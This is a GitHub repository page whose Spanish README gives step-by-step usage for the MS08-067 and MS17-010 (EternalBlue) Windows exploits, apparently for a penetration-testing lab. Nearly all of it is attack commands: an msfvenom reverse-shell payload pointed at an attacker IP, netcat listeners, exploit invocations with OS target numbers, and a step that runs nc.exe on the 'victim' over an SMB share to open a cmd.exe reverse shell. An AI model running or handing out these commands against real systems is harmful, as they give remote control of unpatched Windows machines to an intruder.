Skip to content

W0lfF4ng/Exploits

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 

Repository files navigation

Exploits

MS08-067 (NetAPI)

Código original

Uso:

  1. Generar reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.157 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -a x86 --platform windows -v shellcode
  1. Modificar la variable shellcode (línea 54) con el resultado de msfvenom
  2. Dejar a la escucha el puerto seleccionado
nc -lnvp 443
  1. Ejecutamos el exploit indicando el número de OS y el puerto (el autor recomienda usar el siguiente comando de nmap para validar el OS: nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1)
    • 1 para Windows XP SP0/SP1 Universal
    • 2 para Windows 2000 Universal
    • 3 para Windows 2003 SP0 Universal
    • 4 para Windows 2003 SP1 English
    • 5 para Windows XP SP3 French (NX)
    • 6 para Windows XP SP3 English (NX)
    • 7 para Windows XP SP3 English (AlwaysOn NX)
python3 ms08-067.py 192.168.1.1 6 445

MS17-010 (EternalBlue)

Código original ms17-010.py

Código original mysmb.py

Uso:

  1. Es necesario tener ambos códigos (ms17-010.py y mysmb.py) en el mismo directorio
  2. Ejecutamos el exploit
python3 ms17-010.py 192.168.1.1
  1. Debido que la shell generada no es muy estable, se recomienda generar una nueva shell usando netcat
  • Levantamos una carpeta compartida
python3 /usr/share/doc/python3-impacket/examples/smbserver.py tmp /usr/share/windows-binaries/
  • Nos ponemos a la escucha
nc -lnvp 443
  • Ejecutamos netcat en la máquina víctima
\\10.11.0.157\tmp\nc.exe 10.11.0.157 443 -e cmd.exe

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages